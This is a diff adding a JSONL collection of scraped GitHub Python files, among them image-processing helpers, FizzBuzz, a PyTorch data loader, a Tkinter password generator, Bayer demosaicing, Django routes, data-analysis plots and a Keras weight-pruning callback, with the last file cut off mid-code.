diff --git "a/4812.jsonl" "b/4812.jsonl" new file mode 100644--- /dev/null +++ "b/4812.jsonl" @@ -0,0 +1,746 @@ +{"seq_id":"42638434885","text":"from numpy import *\nimport math\nimport numpy as np\nimport cv2\n\n\ndef calc_rect(p1_x, p1_y, p2_x, p2_y):\n yp1 = p1_y\n xp1 = p1_x\n yp2 = p2_y\n xp2 = p2_x\n lenAB = math.sqrt(math.pow(xp1 - xp2, 2) + math.pow(yp1 - yp2, 2))\n\n print(\"Length=%f\" % lenAB)\n\n totalLength = 200\n delta_xp = (math.fabs(xp2 - xp1) * (totalLength - lenAB) / 2) / lenAB\n delta_yp = (math.fabs(yp1 - yp2) * (totalLength - lenAB) / 2) / lenAB\n\n if (xp1 > xp2):\n kx = 1\n else:\n kx = -1\n\n if (yp1 > yp2):\n ky = 1\n else:\n ky = -1\n\n xp1_0 = xp1 + kx * delta_xp\n yp1_0 = yp1 + ky * delta_yp\n xp2_0 = xp2 - kx * delta_xp\n yp2_0 = yp2 - ky * delta_yp\n\n print(\"deltaXY=[%f,%f]\" % (delta_xp, delta_yp))\n print(\"p1=[%f,%f], p2=[%f,%f]\" % (xp1_0, yp1_0, xp2_0, yp2_0))\n\n intp1x = np.int0(xp1_0)\n intp1y = np.int0(yp1_0)\n intp2x = np.int0(xp2_0)\n intp2y = np.int0(yp2_0)\n print(\"point p1=[%d,%d], p2=[%d,%d]\" % (intp1x, intp1y, intp2x, intp2y))\n\n return intp1x, intp1y, intp2x, intp2y\n\n\n# 获取一个点阵集描述的曲线的两个端点,如果是封闭的,则不返回\ndef getTerminalPoint(x, y, edges):\n height, width = np.shape(edges)\n counter = 0\n if (y > 0) and (x > 0) and (edges[y - 1, x - 1] > 0):\n counter = counter + 1\n if (y > 0) and (edges[y - 1, x] > 0):\n counter = counter + 1\n if (y > 0) and (x < width) and (edges[y - 1, x + 1] > 0):\n counter = counter + 1\n if (x > 0) and (edges[y, x - 1] > 0):\n counter = counter + 1\n if (x < width) and (edges[y, x + 1] > 0):\n counter = counter + 1\n if (x > 0) and (y < height) and (edges[y + 1, x - 1] > 0):\n counter = counter + 1\n if (y < height) and (edges[y + 1, x] > 0):\n counter = counter + 1\n if (y < height) and (x < width) and (edges[y + 1, x + 1] > 0):\n counter = counter + 1\n return counter\n\n\n# 找圆的方法, 在相连的点内,不跨不相连的点\n# listPoints 连接的线的集合\n# minRadius 最小的半径\n# maxRadius 最大的半径 系统限制为100\n# width 线宽\n# minDistance 圆心之间的最小距离\n# imgWidth 图像的宽\n# imgHeight 图像的高\n# minPoints 最少包含的点\ndef findCircle(listPoints, minRadius, maxRadius, width, minDistance, imgWidth, imgHeight, minPoints):\n imgLabel = np.zeros((imgHeight, imgWidth), np.uint8)\n for y in range(imgHeight):\n print(\"total=%d, process y=%d\" % (imgHeight, y))\n for x in range(imgWidth):\n for radius in range(minRadius, maxRadius):\n imgTemp = np.zeros((imgHeight, imgWidth), np.uint8)\n cv2.circle(imgTemp, (x, y), radius, 255, width) # 画圆\n for points in listPoints:\n if len(points) < minPoints:\n continue\n for x, y in points:\n if imgTemp[y, x] > 0:\n imgLabel[y, x] += 1\n\n return imgLabel\n\n\n# 计算点的连通性\ndef connect(edges, x, y):\n height, width = edges.shape\n height = height - 1\n width = width - 1\n counter = 0\n if (y > 0) and (x > 0) and (edges[y - 1, x - 1] > 0):\n counter = counter + 1\n if (y > 0) and (edges[y - 1, x] > 0):\n counter = counter + 1\n if (y > 0) and (x < width) and (edges[y - 1, x + 1] > 0):\n counter = counter + 1\n if (x > 0) and (edges[y, x - 1] > 0):\n counter = counter + 1\n if (x < width) and (edges[y, x + 1] > 0):\n counter = counter + 1\n if (x > 0) and (y < height) and (edges[y + 1, x - 1] > 0):\n counter = counter + 1\n if (y < height) and (edges[y + 1, x] > 0):\n counter = counter + 1\n if (y < height) and (x < width) and (edges[y + 1, x + 1] > 0):\n counter = counter + 1\n return counter\n\n\n# 判断一个曲线是否是凸的\n# 在一个曲线的两端,在一个规定的矩形范围内,进行概率式的延展拟合和其他的曲线,找出一个凸的图形\n# calc_rect(549., 58.00000763, 521., 132.)\n\n\n# histogram统计\ndef calcAndDrawHist(image, color):\n hist = cv2.calcHist([image], [0], None, [256], [1.0, 255.0])\n minVal, maxVal, minLoc, maxLoc = cv2.minMaxLoc(hist)\n histImg = np.zeros([256, 256, 3], np.uint8)\n hpt = int(0.9 * 256)\n\n for h in range(256):\n intensity = int(hist[h] * hpt / maxVal)\n cv2.line(histImg, (h, 256), (h, 256 - intensity), color)\n\n return histImg\n","repo_name":"OldJ2010/fruitrecognize","sub_path":"mylib.py","file_name":"mylib.py","file_ext":"py","file_size_in_byte":4438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"16556598204","text":"# Fizz Buzz\n# For a given range example 1 to 50\n# For multiples of 3 insert Fizz in the list\n# For multiples of 5 insert Buzz in the list\n# For multiples of 3 & 5 insert FizzBuzz\n# return the list\n#\n# Learnings: Mutliples of 3 and 5 can be found by doing % 15 and would save one if condition\n\n#Function to validate input type and to check if input greater than one.\ndef processInput(input):\n inputType = type(input)\n print(inputType)\n if(str(inputType) == \"\"):\n print(\"valid input\")\n else:\n print(\"invalid input\")\n #raise Exception(\"Sorry, invalid input\")\n exit()\n if(input < 1):\n print(\"Invalid input\", + input)\n exit()\n\n\ndef fizzBuzz(iprange):\n processInput(iprange)\n myList = []\n for input in range(1,iprange):\n if(input%15 == 0):\n #print(\"FizzBuzz\", end =\" \")\n myList.append(\"FizzBuzz\")\n continue\n elif(input%5 == 0):\n #print(\"Buzz\", end =\" \")\n myList.append(\"Buzz\")\n continue\n elif(input%3 == 0):\n #print(\"Fizz\", end =\" \")\n myList.append(\"Fizz\")\n continue\n else:\n #print(input, end =\" \")\n myList.append(input)\n return myList\n\n#Vary the inputs(normal scenarios and boundary scenarios) example: -1 , 0 , \"hello\" , 1.49 etc\nresult = fizzBuzz(25)\nprint(len(result))\nfor x in range(len(result)):\n print(x, end =\" \")\n print(result[x], end =\" \")\n\n\"\"\"\n#Profiling info\nimport cProfile\ncProfile.run('fizzBuzz(10000000)')\n\n 10000006 function calls in 3.848 seconds\n\n Ordered by: standard name\n\n ncalls tottime percall cumtime percall filename:lineno(function)\n 1 0.073 0.073 3.848 3.848 :1()\n 1 0.000 0.000 0.001 0.001 fizzBuzzType1v1.py:11(processInput)\n 1 2.802 2.802 3.775 3.775 fizzBuzzType1v1.py:25(fizzBuzz)\n 1 0.000 0.000 3.848 3.848 {built-in method builtins.exec}\n 2 0.001 0.000 0.001 0.000 {built-in method builtins.print}\n 9999999 0.972 0.000 0.972 0.000 {method 'append' of 'list' objects}\n 1 0.000 0.000 0.000 0.000 {method 'disable' of '_lsprof.Profiler' objects}\n \"\"\"\n","repo_name":"prithvibv/python","sub_path":"DSA/Arrays/FizzBuzz/fizzBuzzType1v1.py","file_name":"fizzBuzzType1v1.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14464222235","text":"from torch.utils.data import Dataset\nimport h5py\nfrom torchvision.transforms import functional\nimport torchvision.transforms as transforms\n\n\nclass ODOC(Dataset):\n \"\"\" ODOC Dataset \"\"\"\n def __init__(self, base_dir=None, split='test'):\n self._base_dir = base_dir\n self.sample_list = []\n test_path = self._base_dir + '/' + str(split) + '.list'\n with open(test_path, 'r') as f:\n self.image_list = f.readlines()\n\n self.image_list = [item.replace('\\n', '') for item in self.image_list]\n\n self.test_transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225])\n ])\n\n def __len__(self):\n return len(self.image_list)\n\n def __getitem__(self, idx):\n image_name = self.image_list[idx]\n h5f = h5py.File(self._base_dir + '/h5py_all' + '/'+image_name, 'r')\n image = self.test_transform(h5f['img'][:])\n label = functional.to_tensor(h5f['mask'][:])\n con_gau = functional.to_tensor(h5f['con_gau'][:])\n sample = {'img': image, 'mask': label, 'con_gau': con_gau}\n return sample, image_name\n\n\n","repo_name":"smallmax00/Graph_Region_Boudnary","sub_path":"utils/Dataloader_ODOC.py","file_name":"Dataloader_ODOC.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"32"} +{"seq_id":"70436499613","text":"import pandas as pd\nimport re\n\nif __name__ == '__main__':\n # ----------------Read Data----------------\n data_path = \"./output/sub_trim_2k.csv\"\n sample_path = \"./input/validation.csv\"\n ss_path = \"./output/eupt_sample_submission.csv\"\n raw_data = pd.read_csv(data_path, encoding=\"utf-8\")\n sample_data = pd.read_csv(sample_path, encoding=\"utf-8\", header=0, usecols=[0])\n ss_data = pd.read_csv(ss_path, encoding=\"utf-8\", header=0, usecols=[0])\n\n # print(sample_data.columns.tolist())\n # print(sample_data.head(5))\n print(len(sample_data))\n print(len(raw_data))\n print(len(ss_data))\n\n columns = raw_data.columns.tolist()\n\n lst = []\n for i in range(len(raw_data)):\n lst.append(raw_data.iloc[i].values.tolist())\n\n index = []\n\n for i in range(len(lst)):\n # print(type(lst), type(lst[i]))\n index.append(lst[i].index(max(lst[i])))\n # print(i, index[i], max(lst[i]))\n\n predict = []\n for i in range(len(index)):\n predict.append(columns[index[i]])\n\n print(len(predict))\n\n for i in range(len(predict)):\n predict[i] = re.sub(\"[Label_]\", \"\", predict[i])\n\n result = pd.DataFrame(predict, columns=[\"PREDICT\"])\n result = pd.concat([sample_data[\"id\"], result], axis=1)\n result.to_csv(\"./output/result_old.csv\", index=False, encoding=\"utf-8\", header=None)\n print(\"Done!\\n\")\n","repo_name":"dhr1676/SMP-EUPT-2018","sub_path":"ding_accuracy.py","file_name":"ding_accuracy.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"42945051669","text":"import tkinter as tk\r\nimport module.useful_fct as use\r\nfrom module.pwGen import GenPw\r\nimport re\r\n\r\nBG = \"#333333\"\r\nFG = \"#FFFFFF\"\r\nFONT10 = (\"Helvetica\",10)\r\nFONT20 = (\"Helvetica\",20)\r\n\r\nL10PARAM = {\r\n \"bg\" : BG,\r\n \"fg\" : FG,\r\n \"font\" : (\"Helvetica\",10)\r\n}\r\nL20PARAM = {\r\n \"bg\" : BG,\r\n \"fg\" : FG,\r\n \"font\" : (\"Helvetica\",20)\r\n}\r\nBPARAM = {\r\n \"bg\" : \"#555555\",\r\n \"fg\" : FG,\r\n \"font\" : (\"Helvetica\",10),\r\n \"relief\" : \"raised\",\r\n}\r\nEPARAM = {\r\n \"bg\" : \"#555555\",\r\n \"fg\" : FG,\r\n \"font\" : (\"Helvetica\",10),\r\n}\r\nPACK = {\r\n \"padx\" : 8,\r\n \"pady\" : 8\r\n}\r\n\r\nclass UI():\r\n def __init__(self) -> None:\r\n self.root = tk.Tk()\r\n self.root.title(\"Password Generator\")\r\n self.root.config(bg=BG)\r\n self.root.iconbitmap(\"assets/cadenas.ico\")\r\n self.root.bind(\"\", self.exit)\r\n self.generator = GenPw()\r\n self.generated_pw = \"Generate a password\"\r\n\r\n self.display_menu()\r\n\r\n def display_menu(self):\r\n use.clear(self.root)\r\n \r\n title = tk.Label(self.root, text=\"Password Generator\", **L20PARAM)\r\n title.pack()\r\n\r\n buttonFrame = tk.Frame(self.root, bg=BG)\r\n buttonFrame.pack()\r\n\r\n sub1Frame = tk.Frame(buttonFrame, bg=BG)\r\n sub1Frame.pack(side=\"left\")\r\n\r\n self.lower_B = tk.Label(sub1Frame, text=\"Lowercase\", bg=\"#00DD00\", fg=\"#000000\", width=10)\r\n self.lower_B.bind(\"\", self.toggle_label_color)\r\n self.lower_B.pack(**PACK)\r\n self.upper_B = tk.Label(sub1Frame, text=\"Uppercase\", bg=\"#00DD00\", fg=\"#000000\", width=10)\r\n self.upper_B.bind(\"\", self.toggle_label_color)\r\n self.upper_B.pack(**PACK)\r\n\r\n sub2Frame = tk.Frame(buttonFrame, bg=BG)\r\n sub2Frame.pack(side=\"right\")\r\n\r\n self.digit_B = tk.Label(sub2Frame, text=\"Digit\", bg=\"#00DD00\", fg=\"#000000\", width=10)\r\n self.digit_B.bind(\"\", self.toggle_label_color)\r\n self.digit_B.pack(**PACK)\r\n self.punct_B = tk.Label(sub2Frame, text=\"Special char\", bg=\"#00DD00\", fg=\"#000000\", width=10)\r\n self.punct_B.bind(\"\", self.toggle_label_color)\r\n self.punct_B.pack(**PACK)\r\n\r\n lengthFrame = tk.Frame(self.root, bg=BG)\r\n lengthFrame.pack()\r\n\r\n subLeftFrame = tk.Frame(lengthFrame, bg=BG)\r\n subLeftFrame.pack(side=\"left\")\r\n\r\n length_L = tk.Label(subLeftFrame, text=\"Length :\", **L10PARAM)\r\n length_L.pack(side=\"right\")\r\n\r\n subRightFrame = tk.Frame(lengthFrame, bg=BG)\r\n subRightFrame.pack(side=\"right\")\r\n\r\n self.legnth_E = tk.Entry(subRightFrame, **EPARAM)\r\n self.legnth_E.insert(0, \"10\")\r\n self.legnth_E.pack(side=\"left\", **PACK)\r\n\r\n genFrame = tk.Frame(self.root, bg=BG)\r\n genFrame.pack(fill=\"x\", expand=True)\r\n\r\n generate_B = tk.Button(genFrame, text=\"Generate\", **BPARAM, width=10, command=self.generation)\r\n generate_B.pack(**PACK)\r\n\r\n self.result_L = tk.Entry(genFrame, **EPARAM, width=30)\r\n self.result_L.insert(0, self.generated_pw)\r\n self.result_L.pack(fill=\"x\", expand=True, **PACK)\r\n\r\n saveFrame = tk.Frame(self.root, bg=BG)\r\n saveFrame.pack()\r\n\r\n sub10Frame = tk.Frame(saveFrame, bg=BG)\r\n sub10Frame.pack(fill=\"x\",expand=True, side=\"left\")\r\n\r\n save_L = tk.Label(sub10Frame, text=\"Label : \", **L10PARAM)\r\n save_L.pack()\r\n\r\n sub11Frame = tk.Frame(saveFrame, bg=BG)\r\n sub11Frame.pack(fill=\"x\",expand=True, side=\"left\")\r\n\r\n self.save_E = tk.Entry(sub11Frame, **EPARAM)\r\n self.save_E.insert(0, \"ID tag\")\r\n self.save_E.bind(\"\", self.save)\r\n self.save_E.pack()\r\n\r\n sub12Frame = tk.Frame(saveFrame, bg=BG)\r\n sub12Frame.pack(fill=\"x\",expand=True, side=\"left\")\r\n\r\n save_B = tk.Button(sub12Frame, text=\"Save\", **BPARAM, command=self.save)\r\n save_B.pack(padx=10)\r\n\r\n botFrame = tk.Frame(self.root, bg=BG)\r\n botFrame.pack(fill=\"x\", expand=True)\r\n\r\n sub20Frame = tk.Frame(botFrame, bg=BG)\r\n sub20Frame.pack(fill=\"x\", expand=True)\r\n\r\n history_B = tk.Button(sub20Frame, text=\"History\", **BPARAM, command=self.history_display)\r\n history_B.pack()\r\n\r\n sub21Frame = tk.Frame(botFrame, bg=BG)\r\n sub21Frame.pack(fill=\"x\", expand=True)\r\n\r\n exit_B = tk.Button(sub21Frame, text=\"Exit\", **BPARAM, command=self.exit)\r\n exit_B.pack(side=\"right\")\r\n\r\n use.set_geometry(self.root, 100, 50)\r\n\r\n def history_display(self):\r\n use.popup(self.root, self.generator.get(),\"History\",font=FONT10)\r\n\r\n def generation(self):\r\n self.generator.set_attr((self.lower_B.cget(\"bg\")==\"#00DD00\"),(self.upper_B.cget(\"bg\")==\"#00DD00\"),(self.digit_B.cget(\"bg\")==\"#00DD00\"),(self.punct_B.cget(\"bg\")==\"#00DD00\"))\r\n try:\r\n length = int(self.legnth_E.get())\r\n except:\r\n length = 10\r\n self.generated_pw = self.generator.generate_pw(length)\r\n self.result_L.delete(0,\"end\")\r\n self.result_L.insert(0,self.generated_pw)\r\n\r\n def save(self, e=None):\r\n pw = self.result_L.get()\r\n tag = re.match(\"^[a-zA-Z0-9]+$\",self.save_E.get())\r\n if tag is not None:\r\n self.generator.save_pw(pw,tag[0])\r\n use.popup(self.root,\"Password Saved Successful\", \"Save Message\", BG, FG, FONT10)\r\n else:\r\n use.popup(self.root,\"Password Saved Failed\", \"Save Message\", BG, FG, FONT10)\r\n\r\n def toggle_label_color(self, evt) -> None:\r\n label = evt.widget\r\n current_color = label.cget(\"background\")\r\n\r\n if current_color == \"#00DD00\":\r\n label.config(bg=\"#DD0000\")\r\n else:\r\n label.config(bg=\"#00DD00\")\r\n\r\n def run(self):\r\n self.root.mainloop()\r\n\r\n def exit(self, e=None):\r\n self.root.destroy()","repo_name":"Baltemor369/password-generator","sub_path":"mdp_generator/module/UI.py","file_name":"UI.py","file_ext":"py","file_size_in_byte":5869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26906771505","text":"import cv2\nimport numpy as np\n\norg_img = cv2.imread('test.png')\n\nimg_h = org_img.shape[0]\nimg_w = org_img.shape[1]\n\nbayer_array = np.zeros((img_h, img_w), dtype = np.uint8)\n\nbayer_img = np.zeros((img_h*2, img_w*2, 3), dtype=np.uint8)\n\nrgb_image = np.zeros((img_h, img_w, 3), dtype = np.uint8)\n\n#Bayer layer\n#BGBGBGBG......\n#GRGRGRGR......\n#BGBGBGBG......\n#GRGRGRGR......\n\ndef rgb_2_bayer():\n bayer_img[::2, ::2, 0] = org_img[:, :, 0]\n bayer_img[1::2, ::2, 1] = org_img[:, :, 1]\n bayer_img[::2, 1::2, 1] = org_img[:, :, 1]\n bayer_img[1::2, 1::2, 2] = org_img[:, :, 2]\n\n cv2.imwrite(\"bayer_img.png\", bayer_img)\n\ndef bayer_hex():\n for i in range(img_h):\n for j in range(img_w):\n if (i % 2 == 0):\n if (j % 2 == 0):\n bayer_array[i, j] = org_img[i, j, 0]\n else:\n bayer_array[i, j] = org_img[i, j, 1]\n else:\n if (j % 2 == 0):\n bayer_array[i, j] = org_img[i, j, 1]\n else:\n bayer_array[i, j] = org_img[i, j, 2]\n file =open('bayer_hex.hex','w')\n for e in bayer_array.flatten():\n file.write(format(e, 'x') +'\\n')\n file.close()\n\ndef bayer_2_rgb():\n bayer_array2 = np.zeros((img_h+2, img_w+2))\n bayer_array2[1:-1, 1:-1] = bayer_array\n \n for i in range(img_h):\n for j in range(img_w):\n m = bayer_array2[i:i+3, j:j+3].flatten()\n \n if (i % 2 == 0):\n if (j % 2 == 0):\n r = int((m[0] + m[2] + m[6] + m[8]) / 4)\n g = int((m[1] + m[3] + m[5] + m[7]) / 4)\n b = int(m[4])\n else:\n r = int((m[1] + m[7]) / 2)\n g = int(m[4])\n b = int((m[3] + m[5]) / 2)\n rgb_image[i, j, :] = [b, g, r]\n else:\n if (j % 2 == 0):\n r = int((m[3] + m[5]) / 2)\n g = int(m[4])\n b = int((m[1] + m[7]) / 2)\n else:\n r = int(m[4])\n g = int((m[1] + m[3] + m[5] + m[7]) / 4)\n b = int((m[0] + m[2] + m[6] + m[8]) / 4)\n rgb_image[i, j, :] = [b, g, r]\n cv2.imwrite(\"rgb_image.png\", rgb_image)\n\ndef desplay_img(img):\n cv2.imshow('image',img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\nrgb_2_bayer()\nbayer_hex()\nbayer_2_rgb()\ndesplay_img(org_img)\n","repo_name":"hoikeung/cyclone_v_edge_detection","sub_path":"testbench/python_script/bayer_2_rgb.py","file_name":"bayer_2_rgb.py","file_ext":"py","file_size_in_byte":2478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11229295399","text":"from xml.etree.ElementInclude import include\nfrom django.urls import path\nfrom sms import views\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\n\n\n\nurlpatterns = [\n path('',views.home,name=\"home\"),\n path('about/',views.about_us,name=\"about\"),\n path('staff/',views.staff, name=\"staff\"),\n path('contacts/',views.contacts,name=\"contacts\"),\n path('students/',views.students,name=\"students\"),\n path('applycourse/',views.applycourse,name=\"applycourse\"),\n path('approve/',views.approve,name=\"approve\"),\n path('Disapprove/',views.Disapprove,name=\"Disapprove\"),\n path('register/',views.register,name=\"register\"),\n path('student_home/',views.student_home,name=\"student_home\"),\n path('registered_student/',views.registered_student,name=\"registered_student\"),\n path('approvedstudents/',views.approvedstudents,name=\"approvedstudents\"),\n path('search/',views.search,name=\"search\"),\n path('delete/',views.delete,name=\"delete\"),\n # path('profile/',views.profile,name=\"profile\"), \n path('adminpage/',views.adminpage,name=\"adminpage\"),\n path('studentspdf/',views.studentspdf,name=\"studentspdf\"),\n path('students_pdf/',views.students_information,name=\"students_pdf\"),\n\n\n\n \n \n]","repo_name":"Pkiach/sms","sub_path":"sms/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23068359395","text":"import numpy as np\nimport json\n\n\nclass Continuity:\n def __init__(self, inst, qttPatient, qttCaregiver):\n self.file = 'data/Instances/Instance_' + inst + '/Continuity.json'\n with open(self.file, 'r') as f:\n data = json.load(f)['fidelity']\n self.continuity = np.zeros((qttPatient, qttCaregiver))\n for idPatient, info in data.items():\n for idCaregiver, score in info.items():\n self.continuity[int(idPatient), int(idCaregiver)] = score\n\n def getScore(self, idPatient, idCaregiver):\n return self.continuity[idPatient, idCaregiver]\n","repo_name":"filipesouzacit/GNN-LNS-HHCDP","sub_path":"classes/Continuity.py","file_name":"Continuity.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21724706903","text":"import plotly.plotly as py\nimport plotly.graph_objs as go\nfrom plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot\n\nimport pandas as pd \n\ndf = pd.read_csv(\"./example/models/CD8-CD4-NK_C0C1C2C3C4C5_valid20_gridSearch/gridsearchResults.csv\")\n\n\ndata = [\n go.Parcoords(\n line = dict(color = df['mean_test_f1'],\n colorscale = 'Jet',\n showscale = True,\n reversescale = False,\n cmin = 0.92,\n cmax = 0.95),\n dimensions = list([\n dict(tickvals = [1,2,3],\n label = 'conv_layer_sizes', values = df['conv_layer_sizes'],\n ticktext = ['[32, 32]', '[32, 64]', '[64, 64]']),\n dict(\n tickvals = [1,2],\n label = 'dense_layer_sizes', values = df['dense_layer_sizes'],\n ticktext = ['[64]', '[128]']),\n dict(\n tickvals = [0.25,0.5],\n label = 'dropout', values = df['param_dropout'],\n ticktext = ['0.25', '0.5']),\n dict(\n tickvals = [3,5],\n label = 'kernel_size', values = df['param_kernel_size'],\n ticktext = ['3', '5']),\n dict(\n tickvals = [2],\n label = 'pool_size', values = df['param_pool_size'],\n ticktext = ['2']), \n dict(range=[0.87,1],\n label = 'mean_test_accuracy', values = df['mean_test_accuracy']),\n dict(range=[0.87,1],\n label = 'mean_train_f1', values = df['mean_train_f1']),\n dict(range=[0,1],\n label = 'std_test_f1', values = df['std_test_f1']),\n dict(range=[0.87,1],\n label = 'mean_test_f1', values = df['mean_test_f1']),\n\n\n ])\n )\n]\n\n\n# data = [\n# go.Parcoords(\n# line = dict(color = df['species_id'],\n# colorscale = [[0,'#D7C16B'],[0.5,'#23D8C3'],[1,'#F3F10F']]),\n# dimensions = list([\n# dict(range = [0,8],\n# constraintrange = [4,8],\n# label = 'Sepal Length', values = df['sepal_length']),\n# dict(range = [0,8],\n# label = 'Sepal Width', values = df['sepal_width']),\n# dict(range = [0,8],\n# label = 'Petal Length', values = df['petal_length']),\n# dict(range = [0,8],\n# label = 'Petal Width', values = df['petal_width'])\n# ])\n# )\n# ]\n\nlayout = go.Layout(\n plot_bgcolor = '#E5E5E5',\n paper_bgcolor = '#E5E5E5'\n)\n\nfig = go.Figure(data = data, layout = layout)\nplot(fig, filename = 'parcoords-basic.html')","repo_name":"nmichiels/cifAnalysis","sub_path":"parallelChart.py","file_name":"parallelChart.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32204868988","text":"\n\"\"\"\nCreated on Wed Dec 9 22:36:45 2020\n\n@author: kiransyed\n\"\"\"\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nplt.rcParams['figure.figsize'] = 10,5\nimport seaborn as sb\n\ndf = pd.read_csv(\"AllBoroughs2012-2019.csv\")\nprint(df.head())\n\nprint(df.info())\n\ncols = ['SALE PRICE',\n 'GROSS SQUARE FEET',\n 'LAND SQUARE FEET',\n 'TOTAL UNITS',\n 'COMMERCIAL UNITS',\n 'RESIDENTIAL UNITS']\n\nfor col in cols:\n df[col] = df[col].apply(lambda x: str(x).replace(\"-\",\"\").strip())\n df[col] = df[col].apply(lambda x: str(x).replace(\"$\",\"\").strip())\n df[col] = df[col].apply(lambda x: str(x).replace(\"nan\",\"0\").strip())\n df[col] = df[col].apply(lambda x: str(x).replace(\",\",\"\").strip())\n\nfor col in cols:\n df[col] = pd.to_numeric(df[col])\n\ndf['SALE DATE'] = pd.to_datetime(df['SALE DATE'])\n\nprint(df.info())\n\nprint(df.isna().sum())\n\ndf.corr()['SALE PRICE'].index\nplt.bar(df.corr()['SALE PRICE'].index, df.corr()['SALE PRICE'])\nplt.tight_layout()\nplt.xticks(rotation=90)\nplt.grid()\nplt.title(\"Correlation of Sale Price VS other Factors\", size=24)\nplt.show()\n\nsb.heatmap(df.corr(),annot=True,cmap=\"YlGnBu\")\n\nprint(df['SALE DATE'].dt.year)\n\ndf.set_index(df['SALE DATE']).resample(\"Y\").sum()[\"SALE PRICE\"].plot()\nplt.title(\"SUM(SALE PRICE) vs YEAR\")\nplt.show()\n\ndf.set_index(df['SALE DATE']).resample(\"M\").sum()[\"SALE PRICE\"].plot()\nplt.title(\"SUM(SALE PRICE) vs MONTH\")\nplt.show()\n\ndf.set_index(df['SALE DATE']).resample(\"M\").sum()[\"SALE PRICE\"].plot()\ndf.set_index(df['SALE DATE']).resample(\"M\").sum()[\"SALE PRICE\"].rolling(10, win_type='gaussian').sum(std=0.5).plot()\nplt.title(\"SUM(SALE PRICE) vs MONTH\")\nplt.legend(['SUM SALE PRICE', 'ROLLING MEAN OF WINDOW 10'])\nplt.show()\n\nsb.scatterplot(df['BOROUGH'], df['SALE PRICE'])\nplt.xticks([1,2,3,4,5])\nplt.show()\n\nplt.figure(figsize=(30,5))\nsb.scatterplot(df['BUILDING CLASS CATEGORY'], df['SALE PRICE'])\nplt.xticks(rotation=90)\nplt.show()\n\n","repo_name":"alexandrachan7/CIS-9650-Group-1","sub_path":"Codes/A - Factors.py","file_name":"A - Factors.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73412073691","text":"import numpy as np\nimport tensorflow as tf\nimport utils.prune.helper\n\n\n\"\"\"\nMagnitude weight pruning schedule - Mask all weights that are within the threshold.\n\nEG: threshold = 0.1. ALl weights between -0.1 and 0.1 are masked with 0s\n\n\"\"\"\n\n\nclass schedule(tf.keras.callbacks.Callback):\n \n\n # Set pruning configuration\n def __init__(self, pruning_config):\n self.pruning_config = pruning_config\n self.mask_exists = False\n self.gradual_counter = 1\n self.valid_layers = 'dense'\n \n \n # Initialise pruning mask (0s of network shape)\n def create_ones_mask(self):\n \n masks = []\n for weights in self.model.get_weights():\n\n layer_mask = np.ones(weights.shape)\n masks.append(layer_mask)\n \n return masks\n \n \n # Update mask for weight vector based on new weights\n def get_layer_mask(self, weights, sparsity, ID):\n\n # Return locations where value is between bounds\n def abs_thresholding(data, sparsity):\n return np.where(np.abs(data) < sparsity)\n\n mask = np.ones(weights.shape)\n \n # If the layer is a valid layer to prune. Locate indexs to mask. Otherwise keep mask of 1s (no pruning)\n if utils.prune.helper._validate_layer(ID, self.valid_layers):\n locations = abs_thresholding(weights, sparsity)\n mask[locations] = 0\n \n return mask\n\n \n \n # Apply magnitude pruning schedule\n def apply_layer_mask(self, weights, mask):\n return weights * mask\n \n \n\n # Create new weight matrix using sparsity value. Return new weights and mask\n def get_masked_weights(self, sparsity):\n\n masks = []\n new_weights = []\n for layer, weights in zip(self.model.layers, self.model.get_weights()):\n\n\n layer_mask = self.get_layer_mask(weights, sparsity, layer.name)\n masks.append(layer_mask)\n\n pruned_weights = self.apply_layer_mask(weights, layer_mask)\n new_weights.append(pruned_weights)\n\n return new_weights, masks \n \n \n \n # Prune at the beginning of each epoch\n def on_epoch_begin(self, epoch, logs=None):\n \n\n # If the threshold is 0 -- ignore and dont prune\n if self.pruning_config['threshold'] != 0 and epoch >= self.pruning_config['epoch_threshold']:\n \n \n # Creates a static mask in one shot\n if self.pruning_config['function'] == 'one_shot_static':\n \n if self.mask_exists:\n masks = self.model.masks \n sparsity = self.pruning_config['threshold']\n \n else:\n sparsity = self.pruning_config['threshold']\n new_weights, masks = self.get_masked_weights(sparsity)\n self.model.set_weights(new_weights)\n self.mask_exists = True\n \n \n # Creates a new mask each epoch\n elif self.pruning_config['function'] == 'one_shot':\n \n sparsity = self.pruning_config['threshold']\n new_weights, masks = self.get_masked_weights(sparsity)\n self.model.set_weights(new_weights)\n \n \n \n \n # Gradual convergence results in a static mask\n elif self.pruning_config['function'] == 'gradual':\n \n sparsity = self.pruning_config['threshold'] * (self.gradual_counter / self.pruning_config['converge_over'])\n self.gradual_counter += 1\n \n if sparsity > self.pruning_config['threshold']:\n sparsity = self.pruning_config['threshold']\n \n if self.mask_exists:\n masks = self.model.masks \n \n else:\n \n new_weights, masks = self.get_masked_weights(sparsity)\n self.model.set_weights(new_weights)\n \n # If we have hit max pruning -- keep a static mask\n if sparsity == self.pruning_config['threshold']:\n self.mask_exists = True\n \n \n \n else:\n masks = self.create_ones_mask()\n 